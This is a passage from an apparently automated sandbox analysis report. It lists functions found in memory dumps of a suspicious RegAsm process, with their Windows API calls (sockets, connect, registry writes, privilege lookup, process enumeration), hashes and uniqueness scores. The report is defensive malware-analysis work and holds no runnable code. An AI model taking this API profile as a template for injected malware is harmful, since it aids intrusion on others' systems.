                                  • Opcode ID: da4543034ba5053069b2e58ec0f5e5af1cf81786277bae6e746426934b23fc46
                                  • Instruction ID: 6bca323b3237137e0b74146f16c0ee00471fbcd1d250632ca38fa58d3ffcbadd
                                  • Opcode Fuzzy Hash: da4543034ba5053069b2e58ec0f5e5af1cf81786277bae6e746426934b23fc46
                                  • Instruction Fuzzy Hash: CB21D8B54097C06FE712CB219C84BA2BFA8DF43710F0880D7E9859F153D264A909C772
                                  Uniqueness

                                  Uniqueness Score: 0.07%

                                  Function 204F07D2, Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                  Download Yara Rule
                                  APIs
                                  • LsaOpenPolicy.ADVAPI32(?,00000EB4), ref: 204F0843
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: OpenPolicy
                                  • String ID:
                                  • API String ID: 2030686058-0
                                  • Opcode ID: ce0e2416acaad99164f354827dea812fc99b6607f9e99d07d37c528fe819a3fc
                                  • Instruction ID: f4ffa75fb36f56872be050f4f75debbf4e311f1c340a443cf5fd8fcfbf23e1f0
                                  • Opcode Fuzzy Hash: ce0e2416acaad99164f354827dea812fc99b6607f9e99d07d37c528fe819a3fc
                                  • Instruction Fuzzy Hash: E421A1B1500304AFF720EF54DC84FAAFBA8EF95610F14845AED45DA242D778E905CAB1
                                  Uniqueness

                                  Uniqueness Score: 2.12%

                                  Function 204F04BE, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateMutexW.KERNEL32(?,?), ref: 204F0531
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID:
                                  • API String ID: 1964310414-0
                                  • Opcode ID: 3c486cc52149bfa6c1da7c6ca982ca66a6ed0a932909c93bede547444dacb1d0
                                  • Instruction ID: 37da4865b54fd15accea0d4c90c909a84757d1cba3a04cdeb149285dee40e5e3
                                  • Opcode Fuzzy Hash: 3c486cc52149bfa6c1da7c6ca982ca66a6ed0a932909c93bede547444dacb1d0
                                  • Instruction Fuzzy Hash: BC218EB1600244AFE710DF65DC89B56FBE8EF54610F1484AAED48CB242D7B9F908CB75
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Function 1DB1A7BA, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 1DB1A834
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: b7931f5651ec0cc06c72940e07e8669b44e8f79ef7f962f3792d4c1c0e533b4a
                                  • Instruction ID: 8338ebf532e8fdbd7be7587da471e94424f32a8514a5445c8097e2b972550192
                                  • Opcode Fuzzy Hash: b7931f5651ec0cc06c72940e07e8669b44e8f79ef7f962f3792d4c1c0e533b4a
                                  • Instruction Fuzzy Hash: BD21C075600200AFE721CF15DC84FA7FBECEF44610F04855AE94ADB252D760F60ACAB2
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 204F1932, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetTokenInformation.KERNELBASE(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 204F199C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: InformationToken
                                  • String ID:
                                  • API String ID: 4114910276-0
                                  • Opcode ID: 78f62872125b28b890cbd84e848c71d8151263879275a999eba7272c05823ee5
                                  • Instruction ID: bd186910e20acf010a1d8ffd20443945780143ac0257a1a04dea19793a203dca
                                  • Opcode Fuzzy Hash: 78f62872125b28b890cbd84e848c71d8151263879275a999eba7272c05823ee5
                                  • Instruction Fuzzy Hash: E511A2B2500244AFE721DF95DC89FABF7ACEF44220F14846AE945DB252D774E604CBB1
                                  Uniqueness

                                  Uniqueness Score: 0.08%

                                  Function 204F12DA, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 204F1345
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileMappingOpen
                                  • String ID:
                                  • API String ID: 1680863896-0
                                  • Opcode ID: 2147004f5036c844091ae64cc680222f15a443e80a2e29d1e7be27778f5da1e2
                                  • Instruction ID: 84fa587a8258de2410024d55ec5e8ffbca6730fe3faddb33ef83ddde91775995
                                  • Opcode Fuzzy Hash: 2147004f5036c844091ae64cc680222f15a443e80a2e29d1e7be27778f5da1e2
                                  • Instruction Fuzzy Hash: AD21C0B1600244AFF710DF65CC89B66FBE8EF04620F14846AED488B752D779E908CA76
                                  Uniqueness

                                  Uniqueness Score: 0.34%

                                  Function 204F2BDD, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                  Download Yara Rule
                                  APIs
                                  • K32EnumProcesses.KERNEL32(?,?,?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 204F2C4E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: EnumProcesses
                                  • String ID:
                                  • API String ID: 84517404-0
                                  • Opcode ID: ac3c60fcf81e45a8eecf3c78f77f939bf091e20d01b92db7eff35eee8846b00e
                                  • Instruction ID: 91e9ccace218db3e39c53fc002bd33a2b6ade67f16323e32501cdadc65daeb78
                                  • Opcode Fuzzy Hash: ac3c60fcf81e45a8eecf3c78f77f939bf091e20d01b92db7eff35eee8846b00e
                                  • Instruction Fuzzy Hash: 49215E715093C49FD712CB65DC85B96BFE8EF06210F0984EBE985CB263D335A908CB61
                                  Uniqueness

                                  Uniqueness Score: 0.51%

                                  Function 204F13DA, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileView
                                  • String ID:
                                  • API String ID: 3314676101-0
                                  • Opcode ID: 67b41c4ba82ae72184bfbd5fbd2c6841b64fba57421e54915841bd775949fcce
                                  • Instruction ID: 48af8629eb6fb1f68a17d5924597338e16296dba2d79be8e89668b5826167895
                                  • Opcode Fuzzy Hash: 67b41c4ba82ae72184bfbd5fbd2c6841b64fba57421e54915841bd775949fcce
                                  • Instruction Fuzzy Hash: 7E21CD71500244AFE721DF55DC89F96FBE8EF48720F04855EE9888B252D779A608CBA2
                                  Uniqueness

                                  Uniqueness Score: 0.27%

                                  Function 204F0CFE, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 204F0D6A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Socket
                                  • String ID:
                                  • API String ID: 38366605-0
                                  • Opcode ID: 8eb49019f4dab847a834c9bdf2d3b9fd2182495f752f50eb9c8a7969f6d1812a
                                  • Instruction ID: 7bbba61d5c1c6760eda02b3267a9893641f90d366eb82fdd7a798f6b0b825f8e
                                  • Opcode Fuzzy Hash: 8eb49019f4dab847a834c9bdf2d3b9fd2182495f752f50eb9c8a7969f6d1812a
                                  • Instruction Fuzzy Hash: EF21DEB1500344AFE721DF95DC84B96FBE8EF48320F04845EED898B252C376B908CB62
                                  Uniqueness

                                  Uniqueness Score: 0.34%

                                  Function 1DB1AE53, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetFileAttributesW.KERNEL32(?,?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1DB1AECB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 2e7e26094bf83ddb6cd41b85fc59f33e959f558d0c0ac24f9015e979f48f29ee
                                  • Instruction ID: 4700ac8af9532c7fc356d135f2ea0b90b3bffe791d69ee83a69521e6569cd781
                                  • Opcode Fuzzy Hash: 2e7e26094bf83ddb6cd41b85fc59f33e959f558d0c0ac24f9015e979f48f29ee
                                  • Instruction Fuzzy Hash: 3321A1B55093C45FDB12CB29DC95B92BFE8EF02314F0980EAE885CF253D325A949CB61
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Function 204F22B4, Relevance: 1.6, APIs: 1, Instructions: 66networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 204F2336
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Connect
                                  • String ID:
                                  • API String ID: 3144859779-0
                                  • Opcode ID: 4958234c359bb24a55bbdf530ea39d4b02425c1e18cdb989504f36c832963142
                                  • Instruction ID: 79d37ee1658dab2c7ab2f9f3e591e746fc7b7b4f37d021209bf562e4b16170bd
                                  • Opcode Fuzzy Hash: 4958234c359bb24a55bbdf530ea39d4b02425c1e18cdb989504f36c832963142
                                  • Instruction Fuzzy Hash: D521A171409384AFD722CF65C884A52FFF4EF06210F0984DEED858B262D375A958CB61
                                  Uniqueness

                                  Uniqueness Score: 0.55%

                                  Function 1DB1A97A, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegSetValueExW.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 1DB1A9EC
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: d1d8bd8c8f9a2c51afb8e2fb979acdfeddd84498f95d4603a2bef805a66d909e
                                  • Instruction ID: 0dc7f41342cb92c424921b4d4ff348d4226a8ebaf7c416b418ce805fc9c284da
                                  • Opcode Fuzzy Hash: d1d8bd8c8f9a2c51afb8e2fb979acdfeddd84498f95d4603a2bef805a66d909e
                                  • Instruction Fuzzy Hash: 7911BEB2600640AFE721DF11DC85BA7FBECEF44610F04855AED469B252D670F949CAB2
                                  Uniqueness

                                  Uniqueness Score: 0.15%

                                  Function 204F103E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 204F10B0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: a2864ca7ee8a34bf6e3fd36468d30d944c2d94371bf9d36c78503302e8568d2e
                                  • Instruction ID: ad0842c2da3ba0ce0a653936f6209e4305a44009cae3e23df3aaeb9cc4d13e69
                                  • Opcode Fuzzy Hash: a2864ca7ee8a34bf6e3fd36468d30d944c2d94371bf9d36c78503302e8568d2e
                                  • Instruction Fuzzy Hash: A611B172600244AFE720DF55CC88FA6FBE8EF44620F04C55AE945DB662DB78E944CA72
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 1DB1A148, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                  • EnumWindows.USER32(?,00000EB4,?,?), ref: 1DB1A1BD
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: EnumWindows
                                  • String ID:
                                  • API String ID: 1129996299-0
                                  • Opcode ID: 269e3dab72fdacccc38108b433bdc01adee94e922edb009106fd4fda76a325d8
                                  • Instruction ID: 02379a2367e231b45952a62ddd58e83a5e5286438e9151b4b86f93212a1a587f
                                  • Opcode Fuzzy Hash: 269e3dab72fdacccc38108b433bdc01adee94e922edb009106fd4fda76a325d8
                                  • Instruction Fuzzy Hash: E511AF719093806FD311CB25CC45B66FFB8EF86620F08819EED488B682D334B915CBA2
                                  Uniqueness

                                  Uniqueness Score: 0.22%

                                  Function 204F1846, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessTimes.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 204F18A5
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ProcessTimes
                                  • String ID:
                                  • API String ID: 1995159646-0
                                  • Opcode ID: d5048103537f2fda4bf5dcbbd17aeb68527f2f75b0c6a74067aa7a09e8c24829
                                  • Instruction ID: db27a1872251b9bdb3fb0ed125feffa5be82985943e3ed7a13dd0449a484e3b9
                                  • Opcode Fuzzy Hash: d5048103537f2fda4bf5dcbbd17aeb68527f2f75b0c6a74067aa7a09e8c24829
                                  • Instruction Fuzzy Hash: 6D11E272500344AFE721DF95DC88FAAFBA8EF44720F14C46AE945CB262D779A904CB71
                                  Uniqueness

                                  Uniqueness Score: 0.34%

                                  Function 204F28F0, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 204F295A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 0d0e3ef00755413f0e5a06d7b215568d33e0398b055258a8f853b971d9a0807b
                                  • Instruction ID: 5f609daf5406a77846829e8b0f52f002f0cac974ec5c597424f1a5722c7b3e8e
                                  • Opcode Fuzzy Hash: 0d0e3ef00755413f0e5a06d7b215568d33e0398b055258a8f853b971d9a0807b
                                  • Instruction Fuzzy Hash: CD116DB26053849FD711CF65DD89B57BFE8EF06220F0884AAED85CB252D374E908CB61
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00F01DBC, Relevance: 1.6, APIs: 1, Instructions: 61fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteFile.KERNEL32(00000000,00F004A2,?,?,00000000,00000000,?,?,40000000,00000002,00000000,00000002,00000100,00000000,00F01DB9,?), ref: 00F01E14
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: e06e6225796106c020deae872fc385efe68ab222df04d69fcdbd4d0f591d42f9
                                  • Instruction ID: d8beddd7ce9bb41cf11e2a2d3195b11327e6f65d70d77092ce820cd65c3ca9f8
                                  • Opcode Fuzzy Hash: e06e6225796106c020deae872fc385efe68ab222df04d69fcdbd4d0f591d42f9
                                  • Instruction Fuzzy Hash: C611D2307843057AFB309A24CC1BFEB3656AF80BA0F544519FE94AA1D2E7E5AC81F651
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 1DB1ADAA, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteFile.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 1DB1AE09
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: 06d0dde877975f60af403596c4ee6c60639142255b1236b4b48baa153b355044
                                  • Instruction ID: fc81642a18d94be7f3a08c39faa3b3e1e233e7732c728868e93387c8bcfa91ad
                                  • Opcode Fuzzy Hash: 06d0dde877975f60af403596c4ee6c60639142255b1236b4b48baa153b355044
                                  • Instruction Fuzzy Hash: 7711C172500240AFE722DF55DC84BA7FBE8EF44720F14845AE9499B252C775A505CBB2
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 1DB1B856, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,00000EB4), ref: 1DB1B8BF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 1bd9cb875b01bbbf98856ac2b51c9518df1fd06086008ef99ea965aac1988446
                                  • Instruction ID: d56cbcf1fa8897478f81ae33b15757aaf18fca0296734ad2e09f6a08a1970197
                                  • Opcode Fuzzy Hash: 1bd9cb875b01bbbf98856ac2b51c9518df1fd06086008ef99ea965aac1988446
                                  • Instruction Fuzzy Hash: FE114871500340AFF721DF11DC85BA6FB98DF41B20F04C099ED495F281C6B4A648CA66
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 204F015E, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CopyFileW.KERNEL32(?,?,?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 204F01A6
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CopyFile
                                  • String ID:
                                  • API String ID: 1304948518-0
                                  • Opcode ID: 9b6ed684b9fcd9380fff5eb70ccd4768c729e739e77ce32dcfd607005aa2706c
                                  • Instruction ID: 722fc82f475fd1318df2ad178e21e4163cc5c8b860bf9ddd2ef053e639a4f2c3
                                  • Opcode Fuzzy Hash: 9b6ed684b9fcd9380fff5eb70ccd4768c729e739e77ce32dcfd607005aa2706c
                                  • Instruction Fuzzy Hash: F5117C716002449FEB10CF69DD89B56FBE8EB54320F18C4AADD49CB342D67AE904CA62
                                  Uniqueness

                                  Uniqueness Score: 0.24%

                                  Function 204F2912, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 204F295A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 9b6ed684b9fcd9380fff5eb70ccd4768c729e739e77ce32dcfd607005aa2706c
                                  • Instruction ID: c6f01500ddfed3d85060012ab4e43a553411bc94112569104cb8668b94c9ba45
                                  • Opcode Fuzzy Hash: 9b6ed684b9fcd9380fff5eb70ccd4768c729e739e77ce32dcfd607005aa2706c
                                  • Instruction Fuzzy Hash: AE1130B17002459FDB50DF59D989B56FBE8EF04220F08C4AADD49CB352D679E904CAA1
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 1DB1BC7A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateDirectoryW.KERNEL32(?,?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1DB1BCBF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateDirectory
                                  • String ID:
                                  • API String ID: 4241100979-0
                                  • Opcode ID: 708e2f9666d751625b3cb3cc5e537c5b47c116522f66bb33636386438bee83de
                                  • Instruction ID: 913c8da3bb5133763dff4181c76a4eac1cc590a54892962cbfd9990515edab26
                                  • Opcode Fuzzy Hash: 708e2f9666d751625b3cb3cc5e537c5b47c116522f66bb33636386438bee83de
                                  • Instruction Fuzzy Hash: 7511C4716002819FE700DF29EC85B56FBD8EF05620F08C4AADC0ACF242EB75E504CB66
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Function 1DB1ACEA, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileType.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 1DB1AD3D
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID:
                                  • API String ID: 3081899298-0
                                  • Opcode ID: d45275a22f2a5983aa33e7a1181dc5726a9a2130910659289ba82ce3500a9778
                                  • Instruction ID: 35e77528113cf17f522bc7ce7b5cfa75e3e78ece26aa9b936d73a9f3aca02d1b
                                  • Opcode Fuzzy Hash: d45275a22f2a5983aa33e7a1181dc5726a9a2130910659289ba82ce3500a9778
                                  • Instruction Fuzzy Hash: E50122B1500640AFE711DF12DC84BA7FBE8DF40B21F04C09AED499F252C674B608CA72
                                  Uniqueness

                                  Uniqueness Score: 0.07%

                                  Function 204F2C0E, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                  Download Yara Rule
                                  APIs
                                  • K32EnumProcesses.KERNEL32(?,?,?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 204F2C4E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: EnumProcesses
                                  • String ID:
                                  • API String ID: 84517404-0
                                  • Opcode ID: 26d5ffcc4d0a59731e11da0aeef13865bcb6ea46776b51c29a9acfd9d96656eb
                                  • Instruction ID: dbe32639736211a4be3cb0309bcadd350fa2e1fb0464fa5bdcdd494919459694
                                  • Opcode Fuzzy Hash: 26d5ffcc4d0a59731e11da0aeef13865bcb6ea46776b51c29a9acfd9d96656eb
                                  • Instruction Fuzzy Hash: 7B1161756002889FD710CF99D989B5AFBE4EF44220F08C4AADD49CB352D779E944CBA2
                                  Uniqueness

                                  Uniqueness Score: 0.51%

                                  Function 204F22EA, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 204F2336
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Connect
                                  • String ID:
                                  • API String ID: 3144859779-0
                                  • Opcode ID: cf36fd75d5656498df726f9756d986f06dec59af26dc4f9853e476d3b9cf2826
                                  • Instruction ID: 5a53cad7b63ee623f1ac527f66cfccf90da3ea2076cbf41b4d591e01a85d6082
                                  • Opcode Fuzzy Hash: cf36fd75d5656498df726f9756d986f06dec59af26dc4f9853e476d3b9cf2826
                                  • Instruction Fuzzy Hash: 631170715007449FDB21CF95D988B56FBE4EF04210F08C5AADD498B612D339E919DFA1
                                  Uniqueness

                                  Uniqueness Score: 0.55%

                                  Function 204F208A, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetKernelObjectSecurity.KERNELBASE(?,?,?), ref: 204F20CA
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: KernelObjectSecurity
                                  • String ID:
                                  • API String ID: 3015937269-0
                                  • Opcode ID: 8d1a1085fc5d9a0eb5438eb75d41b1c347545f76cb7d46a10ea2737c2ab119d1
                                  • Instruction ID: 4cf1c3cd71cc8d9123710ff54b177a478142615b985a307558a9b743c1f46a97
                                  • Opcode Fuzzy Hash: 8d1a1085fc5d9a0eb5438eb75d41b1c347545f76cb7d46a10ea2737c2ab119d1
                                  • Instruction Fuzzy Hash: E011A1726006449FD710CF55D988B56FBE4EF04220F08C4AADE09CB252D739E944CBA2
                                  Uniqueness

                                  Uniqueness Score: 1.51%

                                  Function 1DB1AE8E, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetFileAttributesW.KERNEL32(?,?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1DB1AECB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: e77c0630a594d0e8f449aa72601250bf594c3c84bb811911fd03d7b9557d2475
                                  • Instruction ID: 21bc60c2e5aae0b999efca3466451e8e596b06187da3e30934381634326210d8
                                  • Opcode Fuzzy Hash: e77c0630a594d0e8f449aa72601250bf594c3c84bb811911fd03d7b9557d2475
                                  • Instruction Fuzzy Hash: 0101D272A003809FDB10CF29E884766FBE8EF00220F08C4AADC09CF246D735E405CE62
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Function 1DB1A2B4, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1DB1A308
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
